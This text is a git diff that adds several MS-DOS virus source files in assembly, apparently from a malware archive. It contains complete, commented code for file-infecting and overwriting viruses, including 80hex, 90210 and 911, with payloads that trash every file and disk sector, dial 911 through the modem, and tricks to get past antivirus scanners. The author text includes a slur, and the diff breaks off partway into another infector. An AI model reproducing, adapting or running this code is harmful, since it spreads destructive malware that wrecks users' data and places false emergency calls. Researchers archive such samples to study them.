MOV AH,47H ;GET CURRENT DIRECTORY + MOV SI, OFFSET CURRENTDIR ;BUFFER TO SAVE DIRECTORY IN + INT 21H ; + + MOV DX,OFFSET ROOTDIR ;MOVE DX TO CHANGE TO ROOT DIRECTORY + MOV AH,3BH ;CHANGE DIRECTORY TO ROOT + INT 21H ; + +SCANDIRS: + + MOV CX,13H ;INCLUDE HIDDEN/RO DIRECTORYS + MOV DX, OFFSET WILDCARDS ;LOOK FOR '*' + MOV AH,4EH ;FIND FIRST FILE + INT 21H ; + CMP AX,12H ;NO FIRST FILE? + JNE DIRLOOP ;NO DIRS FOUND? BAIL OUT + +BUS1: + + JMP BUS + +DIRLOOP: + + MOV AH,4FH ;FIND NEXT FILE + INT 21H ; + CMP AX,12H + JE BUS ;NO MORE DIRS FOUND, ROLL OUT + +CHDIR: + + MOV DX,OFFSET DIRDATA+FILENAME;POINT DX TO FCB - FILENAME + MOV AH,3BH ;CHANGE DIRECTORY + INT 21H ; + + MOV AH,2FH ;GET CURRENT DTA ADDRESS + INT 21H ; + MOV [DISKDTASEG],ES ;SAVE OLD SEGMENT + MOV [DISKDTAOFS],BX ;SAVE OLD OFFSET + MOV DX,OFFSET FILEDATA ;OFFSET OF WHERE TO HOLD NEW DTA + MOV AH,1AH ;SET DTA ADDRESS + INT 21H ; + +SCANDIR: + + MOV CX,07H ;FIND ANY ATTRIBUTE + MOV DX,OFFSET FILESPEC ;POINT DX TO "*.com",0 + MOV AH,4EH ;FIND FIRST FILE FUNCTION + INT 21H ; + CMP AX,12H ;WAS FILE FOUND? + JNE TRANSFORM + +NEXTEXE: + + MOV AH,4FH ;FIND NEXT FILE + INT 21H ; + CMP AX,12H ;NONE FOUND + JNE TRANSFORM ;FOUND SEE WHAT WE CAN DO + + MOV DX,OFFSET ROOTDIR ;MOVE DX TO CHANGE TO ROOT DIRECTORY + MOV AH,3BH ;CHANGE DIRECTORY TO ROOT + INT 21H ; + MOV AH,1AH ;SET DTA ADDRESS + MOV DS,[DISKDTASEG] ;RESTORE OLD SEGMENT + MOV DX,[DISKDTAOFS] ;RESTORE OLD OFFSET + INT 21H ; + JMP DIRLOOP + + +BUS: + + JMP ROLLOUT + +TRANSFORM: + + MOV AH,2FH ;TEMPORALLY STORE DTA + INT 21H ; + MOV [TEMPSEG],ES ;SAVE OLD SEGMENT + MOV [TEMPOFS],BX ;SAVE OLD OFFSET + MOV DX, OFFSET FILEDATA + FILENAME + + MOV BX,OFFSET FILEDATA ;SAVE FILE... + MOV AX,[BX]+FILEDATE ;DATE + MOV ORIG_DATE,AX ; + MOV AX,[BX]+FILETIME ;TIME + MOV ORIG_TIME,AX ; AND + MOV AX,[BX]+FILEATTR ; + MOV AX,4300H + INT 21H + MOV ORIG_ATTR,CX + MOV AX,4301H ;CHANGE ATTRIBUTES + XOR CX,CX ;CLEAR ATTRIBUTES + INT 21H ; + MOV AX,3D00H ;OPEN FILE - READ + INT 21H ; + JC FIXUP ;ERROR - FIND ANOTHER FILE + MOV HANDLE,AX ;SAVE HANDLE + MOV AH,3FH ;READ FROM FILE + MOV BX,HANDLE ;MOVE HANDLE TO BX + MOV CX,02H ;READ 2 BYTES + MOV DX,OFFSET IDBUFFER ;SAVE TO BUFFER + INT 21H ; + + MOV AH,3EH ;CLOSE FILE FOR NOW + MOV BX,HANDLE ;LOAD BX WITH HANDLE + INT 21H ; + + MOV BX, IDBUFFER ;FILL BX WITH ID STRING + CMP BX,02EBH ;INFECTED? + JNE DOIT ;SAME - FIND ANOTHER FILE + + +FIXUP: + MOV AH,1AH ;SET DTA ADDRESS + MOV DS,[TEMPSEG] ;RESTORE OLD SEGMENT + MOV DX,[TEMPOFS] ;RESTORE OLD OFFSET + INT 21H ; + JMP NEXTEXE + + +DOIT: + + MOV DX, OFFSET FILEDATA + FILENAME + MOV AX,3D02H ;OPEN FILE READ/WRITE ACCESS + INT 21H ; + MOV HANDLE,AX ;SAVE HANDLE + + CALL INFECTFILE + + ;MOV AX,3EH ;CLOSE FILE + ;INT 21H + +ROLLOUT: + + MOV AX,5701H ;RESTORE ORIGINAL + MOV BX,HANDLE ; + MOV CX,ORIG_TIME ;TIME AND + MOV DX,ORIG_DATE ;DATE + INT 21H ; + + MOV AX,4301H ;RESTORE ORIGINAL ATTRIBUTES + MOV CX,ORIG_ATTR + MOV DX,OFFSET FILEDATA + FILENAME + INT 21H + ;MOV BX,HANDLE + ;MOV AX,3EH ;CLOSE FILE + ;INT 21H + MOV AH,3BH ;TRY TO FIX THIS + MOV DX,OFFSET ROOTDIR ;FOR SPEED + INT 21H ; + MOV AH,3BH ;CHANGE DIRECTORY + MOV DX,OFFSET CURRENTDIR ;BACK TO ORIGINAL + INT 21H ; + MOV AH,2AH ;CHECK SYSTEM DATE + INT 21H ; + CMP CX,1991 ;IS IT AT LEAST 1991? + JB AUDI ;NO? DON'T DO IT NOW + CMP DL,25 ;IS IT THE 25TH? + JB AUDI ;NOT YET? QUIT + CMP AL,5 ;IS fRIDAY? + JNE AUDI ;NO? QUIT + MOV DX,OFFSET DIRDATA ;OFFSET OF WHERE TO HOLD NEW DTA + MOV AH,1AH ;SET DTA ADDRESS + INT 21H ; + MOV AH,4EH ;FIND FIRST FILE + MOV CX,7H ; + MOV DX,OFFSET FILESPEC2 ;OFFSET *.* + +lOOPS: + + INT 21H ; + JC AUDI ;ERROR? THEN QUIT + MOV AX,4301H ;FIND ALL NORMAL FILES + XOR CX,CX ; + INT 21H ; + MOV DX,OFFSET DIRDATA + FILENAME + MOV AH,3CH ;FUCK UP ALL FILES IN CURRENT DIR + INT 21H ; + JC AUDI ;ERROR? QUIT + MOV AH,4FH ;FIND NEXT FILE + JMP LOOPS ; + +AUDI: + + MOV AX,4C00H ;END PROGRAM + INT 21H ; + +;tHE BELOW IS JUST TEXT TO PAD OUT THE VIRUS SIZE TO 808 BYTES. dON'T +;JUST CHANGE THE TEXT AND CLAIM THAT THIS IS YOUR CREATION. + + +WORDS_ DB "sKISM rYTHEM sTACK vIRUS-808. sMART kIDS iNTO sICK mETHODS",0 +WORDS2 DB " dONT ALTER THIS CODE INTO YOUR OWN STRAIN, FAGGIT. ",0 +WORDS3 DB " hr/sss nycITY, THIS IS THE FIFTH OF MANY, MANY MORE....",0 +WORDS4 DB " yOU SISSYS.....",0 + +MAIN ENDP +CODE ENDS + END MAIN + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.80hex.asm b/MSDOS/Virus.MSDOS.Unknown.80hex.asm new file mode 100644 index 00000000..bcd6163a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.80hex.asm @@ -0,0 +1,87 @@ +; ------------------------------------------------------------------------------ +; - 80hex virus - +; (c) 1994 The Unforgiven/Immortal Riot + +; Pay-Load function: +; This will be dropped to the file c:\dos\keyb.com, that often +; is called from autoexec.bat, which will result in that all files +; in DOS being overwritten. Eventually all hds will be trashed as well. + +; General-information: +; It's a simple overwriting virus, BUT not released 'alone' as +; the purpose as a virus that will infect systems and travel +; around the world. It's rather an original pay-load, outsmarted +; by my creative/destructive brain. + +; It's not encrypted, still *NO* anti-virus detects it, this is probably +; due to its simplistic shape. It's *highly* destructive, and is really +; more or less a trojan. But it can replicate, so... + +; Greetings to all destructive virus writers! +; - The Unforgiven/Immortal Riot + + + ;Riot.trivial.80h + +.model tiny +.code +org 100h + +start: +dec byte ptr offset files ; tricking tbscan ! +add ah,4eh ; tricking f-prot ! +mov dx, offset files +next: int 21h + +jnc open + +mov ah,2ch ; Value of 1/100 of a second +int 21h +cmp dl,79 ; 20% +jb quit ; + +mov al,2h + +drive: ; Harddrive, seek and destroy! +mov cx,1 +lea bx,virus +cwd ; clear dx (ax = <8000h) +Next_Sector: +int 26h +inc dx +jnc next_sector ; all sectors +inc al +jmp short drive ; all drives + +quit: +ret + +open: +inc byte ptr offset files + +add ax,3d02h +mov dx, offset 9eh +int 21h + +write: +xchg ax,bx + +mov ah,40h +mov dx, offset start +mov cx, endoffile - start +int 21h + +close: +sub ah,2 +int 21h + +mov ah,4fh +jmp short next + +data: +files db "+.*",0 ; => *.* +virus db "Materialism - the religion of today, " +truth db "ain't it sad?" + +endoffile: +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.90210.asm b/MSDOS/Virus.MSDOS.Unknown.90210.asm new file mode 100644 index 00000000..6c7fe8aa --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.90210.asm @@ -0,0 +1,377 @@ +From smtp Tue Feb 7 13:13 EST 1995 +Received: from lynx.dac.neu.edu by POBOX.jwu.edu; Tue, 7 Feb 95 13:13 EST +Received: by lynx.dac.neu.edu (8.6.9/8.6.9) + id NAA30823 for joshuaw@pobox.jwu.edu; Tue, 7 Feb 1995 13:16:19 -0500 +Date: Tue, 7 Feb 1995 13:16:19 -0500 +From: lynx.dac.neu.edu!ekilby (Eric Kilby) +Content-Length: 8866 +Content-Type: text +Message-Id: <199502071816.NAA30823@lynx.dac.neu.edu> +To: pobox.jwu.edu!joshuaw +Subject: (fwd) 90210 +Newsgroups: alt.comp.virus +Status: O + +Path: chaos.dac.neu.edu!usenet.eel.ufl.edu!usenet.cis.ufl.edu!caen!uwm.edu!news.alpha.net!solaris.cc.vt.edu!uunet!ankh.iia.org!danishm +From: danishm@iia.org () +Newsgroups: alt.comp.virus +Subject: 90210 +Date: 5 Feb 1995 21:55:07 GMT +Organization: International Internet Association. +Lines: 345 +Message-ID: <3h3hfr$sb@ankh.iia.org> +NNTP-Posting-Host: iia.org +X-Newsreader: TIN [version 1.2 PL2] + +Here is the 90210 virus: + +;90210 Virus from the TridenT virus research group. + +;This is a semi-stealth virus that hides file-size changes while +;it is in memory. It marks the files w/the timestamp. It will +;infect COM files on open, execute, delete, and rename. It checks +;if it is in memory by calling Int 21h with DEADh in AX and uses MCB's +;to go memory resident. + +;Disassembly by Black Wolf + +.model tiny +.code + + org 100h + +start: + push ax + call GetOffset + +GetOffset: + pop bp + sub bp,offset GetOffset-start + + mov ax,0DEADh + int 21h ;Are we installed? + cmp ax,0AAAAh + je DoneInstall + + mov ax,3521h + int 21h ;Get int 21 address + + db 2eh, 89h,9eh,77h,0h ;mov cs:[OldInt21-start+bp],bx + db 2eh, 8ch, 86h, 79h, 0 ;mov word ptr cs:[OldInt21-start+2+bp],es + + mov ax,cs + dec ax + mov ds,ax + cmp byte ptr ds:[0],'Z' + jne DoneInstall ;Are we the last block in chain? + + mov ax,ds:[3] ;Get MCB size + sub ax,38h ;subtract virus memory size + jc DoneInstall ;exit if virus > MCB + + mov ds:[3],ax ;Set MCB size + ;sub word ptr ds:[12h],38h ;Subtract virus mem from + db 81h,2eh,12h,0,38h,0 ;top of memory in PSP + + mov si,bp + mov di,0 + mov es,ds:[12h] ;Get top of memory from PSP + push cs + pop ds + mov cx,287h + cld + rep movsb ;Copy virus into memory + + mov ax,2521h + push es + pop ds + mov dx,offset Int21Handler-start + int 21h ;Set int 21h + +DoneInstall: + mov di,100h + lea si,[bp+Storage_Bytes-start] + push cs + push cs + pop ds + pop es + cld + movsw + movsb ;Restore Host file. + mov bx,offset start + pop ax + push bx + retn ;Return to Host + + +VirusName db '[90210 BH]' + +OldInt21: + dw 0 + dw 0 + +Int21Handler: + cmp ax,0DEADh ;Install Check? + jne NotInstall + mov ax,0AAAAh + iret +NotInstall: + + cmp ah,11h ;FCB find first + je FCBSearch + cmp ah,12h ;FCB find next + je FCBSearch + cmp ah,4Eh ;handle find first + je HandleSearch + cmp ah,4Fh ;handle find next + je HandleSearch + + push ax bx cx dx si di bp ds es + + cmp ah,3Dh ;handle file open + je SetupNameCheck + cmp ax,4B00h ;file execute + je SetupNameCheck + cmp ah,41h ;handle file delete + je SetupNameCheck + cmp ah,43h ;get/set attributes + je SetupNameCheck + cmp ah,56h ;rename file + je SetupNameCheck + + cmp ah,0Fh ;Open file w/FCB + je TryToInfect + cmp ah,23h + je TryToInfect ;Get file size + jmp ExitInfect + +FCBSearch: + jmp FCBStealth +HandleSearch: + jmp HandleStealth + +TryToInfect: + db 89h,0d6h ;mov si,dx + + inc si + push cs + pop es + mov di,offset ds:[Filename-start] ;Copy filename + mov cx,8 + rep movsb + mov cx,3 + inc di + rep movsb + + mov dx,Filename-start + push cs + pop ds + +SetupNameCheck: + db 89h, 0d6h ;mov si,dx + mov cx,100h + cld + +Find_Extension: + lodsb + cmp al,'.' ;Find '.' + je CheckFilename + loop Find_Extension + db 0e9h, 13h, 0 ;jmp FilenameBad +CheckFilename: + lodsw + or ax,2020h ;Set to lowercase + cmp ax,6F63h ;Is it a com file? + jne FilenameBad + lodsb + or al,20h + cmp al,6Dh + jne FilenameBad + db 0e9h, 3, 0 ;jmp InfectFile + +FilenameBad: + jmp ExitInfect + +InfectFile: + push dx + push ds + mov ax,4300h + pushf + call dword ptr cs:[OldInt21-start] ;Get Attributes + mov word ptr cs:[FileAttribs-start],cx ;Save them + + mov ax,4301h + xor cx,cx + pushf + call dword ptr cs:[OldInt21-start] ;Reset Attribs to 0 + + mov ax,3D02h + pushf + call dword ptr cs:[OldInt21-start] ;Open file + jnc OpenGood + jmp FileClosed + +OpenGood: + xchg ax,bx + mov ax,5700h + pushf + call dword ptr cs:[OldInt21-start] ;Get file time/date + mov word ptr cs:[FileTime-start],cx ;save time + mov word ptr cs:[FileDate-start],dx ;save date + + and cx,1Fh + cmp cx,1Fh + jne NotInfected ;Check infection + db 0e9h, 76h, 0 ;jmp Close_File +NotInfected: + mov ah,3Fh + push cs + pop ds + mov dx,Storage_Bytes-start + mov cx,3 + pushf + call dword ptr cs:[OldInt21-start] ;Read in first 3 bytes + + cmp word ptr cs:[Storage_Bytes-start],5A4Dh + je DoneWithFile ;Is it an .EXE file? + + cmp word ptr cs:[Storage_Bytes-start],4D5Ah + je DoneWithFile ;Alternate EXE sig? + + mov ax,4202h + xor cx,cx + xor dx,dx + pushf + call dword ptr cs:[OldInt21-start] ;Go end of file. + + sub ax,3 ;Save jump size + mov word ptr cs:[Jump_Bytes-start+1],ax + + mov ah,40h + push cs + pop ds + mov dx,0 + mov cx,287h + pushf + call dword ptr cs:[OldInt21-start] ;Append virus to file + + mov ax,4200h + xor cx,cx + xor dx,dx + int 21h ;go back to beginning + + mov ah,40h + mov dx,Jump_Bytes-Start + mov cx,3 + pushf + call dword ptr cs:[OldInt21-start] ;Write in jump + or word ptr cs:[FileTime-start],1Fh ;Mark as infected + +DoneWithFile: + mov ax,5701h + mov cx,word ptr cs:[FileTime-start] + mov dx,word ptr cs:[FileDate-start] + pushf + call dword ptr cs:[OldInt21-start] ;Restore File Date/Time + +Close_File: + mov ah,3Eh + pushf + call dword ptr cs:[OldInt21-start] ;Close file + + pop ds + pop dx ;Pop filename address + push dx + push ds + mov ax,4301h + mov cx,ds:[FileAttribs-start] + pushf + call dword ptr cs:[OldInt21-start] ;Restore attributes + +FileClosed: + pop ds + pop dx + +ExitInfect: + pop es ds bp di si dx cx bx ax + jmp dword ptr cs:[OldInt21-start] ;Jump back into Int 21h + +GetDTA: + pop si + pushf + push ax bx es + mov ah,2Fh + call CallInt21 + jmp si + +FCBStealth: + call CallInt21 + cmp al,0 ;Did call work? + jne NoStealth + call GetDTA + cmp byte ptr es:[bx],0FFh ;Extended FCB? + jne AfterFCBAdjust + add bx,8 + +AfterFCBAdjust: + mov al,es:[bx+16h] ;Get time stamp + and al,1Fh + cmp al,1Fh ;infected? + jne DoneFCBStealth + + sub word ptr es:[bx+1Ch],287h ;Subtract virus size + sbb word ptr es:[bx+1Eh],0 ;adjust for carry + jmp short ResetTime + +HandleStealth: + call CallInt21 + jc NoStealth + call GetDTA + mov al,es:[bx+16h] ;Get file time + and al,1Fh + cmp al,1Fh + jne DoneFCBStealth + sub word ptr es:[bx+1Ah],287h ;Subtract virus size + sbb word ptr es:[bx+1Ch],0 ;adjust for carry + +ResetTime: + xor byte ptr es:[bx+16h],10h ;Restore time to norm. + +DoneFCBStealth: + pop es bx ax + popf + +NoStealth: + retf 2 + +CallInt21: + pushf + call dword ptr cs:[OldInt21-start] + retn + +Storage_Bytes: + nop + int 21h + +Filename db 8 dup (0) + db '.' +Extension db 3 dup (0) + db 0 + +FileAttribs dw 0 +FileTime dw 0 +FileDate dw 0 + +Jump_Bytes db 0E9h, 00h, 00h + +AuthorName db ' John Tardy / TridenT ' + +end start + + +-- +Eric "Mad Dog" Kilby maddog@ccs.neu.edu +The Great Sporkeus Maximus ekilby@lynx.dac.neu.edu +Student at the Northeatstern University College of Computer Science +"I Can't Believe It's Not Butter" + diff --git a/MSDOS/Virus.MSDOS.Unknown.911.asm b/MSDOS/Virus.MSDOS.Unknown.911.asm new file mode 100644 index 00000000..a696f1f1 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.911.asm @@ -0,0 +1,631 @@ +PAGE 59,132 + +; +; +; 911 Virus +; +; This program is the 911 Virus. Use at your own risk. When the +; manipulation task begins, it will dial 911 through your modem +; and display "Support Your Police" on the screen. +; +; Assemble under Borland's Turbo Asm 2.x +; Link - ignore no stack segment error +; run EXE2BIN 911.EXE 911.COM +; +; And remember ... Don't Get Caught. +; +; + +data_1e equ 0FE12h ;* +data_2e equ 437h ;* +data_3e equ 438h ;* +psp_envirn_seg equ 2Ch +psp_cmd_size equ 80h +psp_cmd_tail equ 81h +data_37e equ 541h ;* + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + org 100h + +v911 proc far + +start: + jmp loc_40 + +v911 endp + +; +; +; External Entry Point +; +; + +int_21h_entry proc far + pushf ; Push flags + cmp ah,0E0h + jne loc_3 ; Jump if not equal + mov ax,0DADAh + popf ; Pop flags + iret ; Interrupt return +int_21h_entry endp + +loc_3: + cmp ah,0E1h + jne loc_4 ; Jump if not equal + mov ax,cs + popf ; Pop flags + iret ; Interrupt return +loc_4: + cmp ax,4B00h + je loc_7 ; Jump if equal +loc_5: + popf ; Pop flags + jmp dword ptr cs:data_5 +data_5 dd 29A138Dh +data_7 dd 70022Bh +data_9 db 0 +data_10 db 8 +data_11 db 10h +data_12 db 9 +data_13 db 34h +data_14 dw 0 + db 0 +data_15 db 0 +data_16 db 0 +data_17 db 0 +data_18 db 43h + db 4Fh, 4Dh +data_19 dw 5 +data_20 dw 2 + db 0, 0 +data_21 dw 1301h +data_22 dw 12ACh +data_23 dw 0FFFEh +data_24 dw 9B70h +data_25 dw 3D5Bh +data_26 dw 20h +data_27 dw 0EC2h +data_28 dw 6E68h + db 00h, 00h, 81h, 00h +data_29 dw 12ACh + db 5Ch, 00h +data_30 dw 12ACh + db 6Ch, 00h +data_31 dw 12ACh +loc_7: + push ds + push bx + push si + push cx + push ax + push dx + push bp + push es + push di + cld ; Clear direction + push dx + push ds + xor cx,cx ; Zero register + mov si,dx +loc_8: + mov al,[si] + cmp al,0 + je loc_9 ; Jump if equal + inc cx + inc si + jmp short loc_8 +loc_9: + add dx,cx + sub dx,3 + mov si,offset data_18 + mov di,dx + cmp byte ptr [di-3],4Eh ; 'N' + jne loc_10 ; Jump if not equal + cmp byte ptr [di-2],44h ; 'D' + je loc_13 ; Jump if equal +loc_10: + mov cx,3 + +locloop_11: + mov al,cs:[si] + cmp al,[di] + jne loc_13 ; Jump if not equal + inc si + inc di + loop locloop_11 ; Loop if cx > 0 + + pop ds + pop dx + push dx + push ds + mov si,dx + mov dl,0 + cmp byte ptr [si+1],3Ah ; ':' + jne loc_12 ; Jump if not equal + mov dl,[si] + and dl,0Fh +loc_12: + mov ah,36h ; '6' + int 21h ; DOS Services ah=function 36h + ; get drive info, drive dl,1=a: + ; returns ax=clust per sector + ; bx=avail clust,cx=bytes/sect + ; dx=clusters per drive + cmp ax,0FFFFh + je loc_13 ; Jump if equal + jmp short loc_15 + db 90h +loc_13: + jmp loc_21 + jmp loc_22 +loc_14: + jmp loc_19 + jmp loc_20 +loc_15: + cmp bx,3 + jb loc_13 ; Jump if below + pop ds + pop dx + push ds + push dx + mov cs:data_24,ds + mov cs:data_25,dx + mov ax,4300h + int 21h ; DOS Services ah=function 43h + ; get attrb cx, filename @ds:dx + mov cs:data_26,cx + mov ax,4301h + xor cx,cx ; Zero register + int 21h ; DOS Services ah=function 43h + ; set attrb cx, filename @ds:dx + mov bx,0FFFFh + mov ah,48h ; 'H' + int 21h ; DOS Services ah=function 48h + ; allocate memory, bx=bytes/16 + mov ah,48h ; 'H' + int 21h ; DOS Services ah=function 48h + ; allocate memory, bx=bytes/16 + mov cs:data_21,ax + mov ax,cs + mov ds,ax + mov dx,data_37e + mov ah,1Ah + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area) ds:dx + pop dx + pop ds + mov ax,3D02h + clc ; Clear carry flag + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jc loc_14 ; Jump if carry Set + mov bx,ax + mov cs:data_19,ax + mov cx,0FFFFh + mov ax,cs:data_21 + mov ds,ax + mov dx,data_2e + mov ah,3Fh ; '?' + clc ; Clear carry flag + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + jc loc_14 ; Jump if carry Set + mov cs:data_20,ax + cmp ax,0E000h + ja loc_14 ; Jump if above + cmp ax,437h + jb loc_17 ; Jump if below + mov si,data_3e + add si,si + sub si,15h + mov cx,13h + mov di,offset data_35 + +locloop_16: + mov al,[si] + mov ah,cs:[di] + cmp ah,al + jne loc_17 ; Jump if not equal + inc si + inc di + loop locloop_16 ; Loop if cx > 0 + + jmp short loc_19 + db 90h +loc_17: + mov ax,4200h + mov bx,cs:data_19 + xor cx,cx ; Zero register + mov dx,cx + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + jc loc_19 ; Jump if carry Set + mov si,100h + mov cx,437h + xor di,di ; Zero register + mov ax,cs:data_21 + mov ds,ax + +locloop_18: + mov al,cs:[si] + mov [di],al + inc si + inc di + loop locloop_18 ; Loop if cx > 0 + + mov ax,5700h + mov bx,cs:data_19 + int 21h ; DOS Services ah=function 57h + ; get file date+time, bx=handle + ; returns cx=time, dx=time + mov cs:data_28,cx + mov cs:data_27,dx + mov ax,cs:data_21 + mov ds,ax + mov si,data_2e + mov al,[si] + add al,0Bh + mov [si],al + xor dx,dx ; Zero register + mov cx,cs:data_20 + add cx,437h + mov bx,cs:data_19 + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + mov cx,cs:data_28 + mov dx,cs:data_27 + mov bx,cs:data_19 + mov ax,5701h + int 21h ; DOS Services ah=function 57h + ; set file date+time, bx=handle + ; cx=time, dx=time +loc_19: + mov bx,cs:data_19 + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + push cs + pop ds +loc_20: + mov dx,psp_cmd_size + mov ah,1Ah + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area) ds:dx + mov ax,cs:data_21 + mov es,ax + mov ah,49h ; 'I' + int 21h ; DOS Services ah=function 49h + ; release memory block, es=seg + mov ax,cs:data_24 + mov ds,ax + mov dx,cs:data_25 + mov ax,4301h + mov cx,cs:data_26 + int 21h ; DOS Services ah=function 43h + ; set attrb cx, filename @ds:dx + jmp short loc_22 + db 90h +loc_21: + pop ds + pop dx + jmp short loc_22 + db 90h +loc_22: + pop di + pop es + pop bp + pop dx + pop ax + pop cx + pop si + pop bx + pop ds + jmp loc_5 + +; +; +; External Entry Point +; +; + +int_08h_entry proc far + push bp + push ds + push es + push ax + push bx + push cx + push dx + push si + push di + pushf ; Push flags + call cs:data_7 + call sub_1 + push cs + pop ds + mov ah,5 + mov ch,data_11 + cmp ah,ch + ja loc_24 ; Jump if above + mov ah,6 + cmp ah,ch + jb loc_24 ; Jump if below + mov ah,data_9 + cmp ah,1 + je loc_23 ; Jump if equal + mov ah,1 + mov data_9,ah + jmp short loc_24 + db 90h +loc_23: + call sub_2 + inc data_14 + mov ax,data_14 + cmp ax,21Ch + jne loc_24 ; Jump if not equal + xor ax,ax ; Zero register + mov data_9,ah + mov data_14,ax + mov data_16,ah +loc_24: + pop di + pop si + pop dx + pop cx + pop bx + pop ax + pop es + pop ds + pop bp + iret ; Interrupt return +int_08h_entry endp + + +; +; SUBROUTINE +; + +sub_1 proc near + push cs + pop ds + xor al,al ; Zero register + mov ah,data_10 + cmp ah,11h + jne loc_28 ; Jump if not equal + mov ah,data_13 + cmp ah,3Bh ; ';' + jne loc_29 ; Jump if not equal + mov ah,data_12 + cmp ah,3Bh ; ';' + jne loc_30 ; Jump if not equal + mov ah,data_11 + cmp ah,17h + jne loc_31 ; Jump if not equal + mov data_11,al +loc_25: + mov data_12,al +loc_26: + mov data_13,al +loc_27: + mov data_10,al + retn +loc_28: + inc data_10 + retn +loc_29: + inc data_13 + jmp short loc_27 +loc_30: + inc data_12 + jmp short loc_26 +loc_31: + inc data_11 + jmp short loc_25 +sub_1 endp + +data_32 db '+++aTh0m0s7=35dp911' + db 7 dup (2Ch) + +; +; SUBROUTINE +; + +sub_2 proc near + mov al,data_16 + cmp al,1 + je loc_ret_39 ; Jump if equal + mov al,data_17 + cmp al,1 + je loc_33 ; Jump if equal + mov cx,3 + +locloop_32: + mov dx,cx + xor ah,ah ; Zero register + mov al,83h + int 14h ; RS-232 dx=com4, ah=func 00h + ; reset port, al=init parameter + loop locloop_32 ; Loop if cx > 0 + + mov al,1 + mov data_17,al + jmp short loc_ret_39 + db 90h +loc_33: + push cs + pop ds + mov si,offset data_32 ; ('+++aTh0m0s7=35dp911') + mov al,data_15 + cmp al,1Ah + jne loc_36 ; Jump if not equal + jmp short loc_37 + db 90h +loc_36: + xor ah,ah ; Zero register + add si,ax + mov al,[si] + mov dx,3F8h + out dx,al ; port 3F8h, RS232-1 xmit buffr + mov dx,2F8h + out dx,al ; port 2F8h, RS232-2 xmit buffr + mov dx,2E8h + out dx,al ; port 2E8h, 8514 Horiz total + mov dx,3E8h + out dx,al ; port 3E8h ??I/O Non-standard + inc data_15 + jmp short loc_ret_39 + db 90h +loc_37: + mov cx,3 + +locloop_38: + mov dx,cx + mov al,0Dh + mov ah,1 + int 14h ; RS-232 dx=com4, ah=func 01h + ; write char al, ah=retn status + loop locloop_38 ; Loop if cx > 0 + + mov ax,1 + mov data_16,al + mov data_15,ah + mov data_17,ah + +loc_ret_39: + retn +sub_2 endp + +loc_40: + mov ah,0E0h + int 21h ; ??INT Non-standard interrupt + cmp ax,0DADAh + jne loc_41 ; Jump if not equal + jmp loc_44 +loc_41: + push cs + pop ds + mov ax,3521h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov word ptr data_5,bx + mov word ptr data_5+2,es + mov dx,offset int_21h_entry + mov ax,2521h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov ax,3508h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov word ptr data_7,bx + mov word ptr data_7+2,es + mov dx,offset int_08h_entry + mov ax,2508h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov ah,2Ch ; ',' + int 21h ; DOS Services ah=function 2Ch + ; get time, cx=hrs/min, dx=sec + mov data_11,ch + mov data_12,cl + mov data_13,dh + mov ax,cs:psp_envirn_seg + mov ds,ax + xor si,si ; Zero register +loc_42: + mov al,[si] + cmp al,1 + je loc_43 ; Jump if equal + inc si + jmp short loc_42 +loc_43: + inc si + inc si + mov dx,si + mov ax,cs + mov es,ax + mov bx,5Ah + mov ah,4Ah ; 'J' + int 21h ; DOS Services ah=function 4Ah + ; change memory allocation + ; bx=bytes/16, es=mem segment + mov bx,cs:psp_cmd_tail + mov ax,cs + mov es,ax + mov cs:data_30,ax + mov cs:data_31,ax + mov cs:data_29,ax + mov ax,4B00h + mov cs:data_22,ss + mov cs:data_23,sp + pushf ; Push flags + call cs:data_5 + mov ax,cs:data_22 + mov ss,ax + mov ax,cs:data_23 + mov sp,ax + mov ax,cs + mov ds,ax + mov dx,537h + int 27h ; Terminate & stay resident + ; dx=offset last byte+1, cs=PSP +loc_44: + mov ah,0E1h + int 21h ; ??INT Non-standard interrupt + mov si,4F3h + mov cs:[si+3],ax + mov ax,4F8h + mov cs:[si+1],ax + mov ax,cs:data_20 + mov bx,cs +;* jmp far ptr loc_1 ;* + db 0EAh, 00h, 00h, 00h, 00h + db 8Bh,0C8h, 8Eh,0DBh + db 0BEh, 00h, 01h + db 0BFh, 37h, 05h + +locloop_45: + mov al,[di] + mov [si],al + inc si + inc di + loop locloop_45 ; Loop if cx > 0 + + mov si,51Fh + mov cs:[si+3],ds + mov al,byte ptr ds:[100h] + sub al,0Bh + mov byte ptr ds:[100h],al + mov ax,ds + mov es,ax + mov ss,ax + jmp far ptr start +data_35 db 'Support Your Police' +data_36 db 0D8h + db 20h + +seg_a ends + + + + end start + +; +; This quality file was downloaded from +; +; E X T R E M E +; ------------+------------ Ŀ +; /|\ +; / | \ Portland Metro All Text BBS +; / | \ +; / | \ 9600: 503-775-0374 +; / | \ SysOp: Thing One +; / | \ +; / | \ +; d r e a m e s + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown._468.asm b/MSDOS/Virus.MSDOS.Unknown._468.asm new file mode 100644 index 00000000..4ed48693 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown._468.asm @@ -0,0 +1,257 @@ +; virus from ALT-11 mag + +; --------------------------------------- +; +; Coded by: Azagoth +; --------------------------------------- +; Assemble using Turbo Assembler: +; tasm /m2 .asm +; tlink /t .obj +; --------------------------------------------------------------------------- +; - Non-Overwriting .COM infector (excluding COMMAND.COM) +; - COM growth: XXX bytes +; - It searches the current directory for uninfected files. If none are +; found, it searches previous directory until it 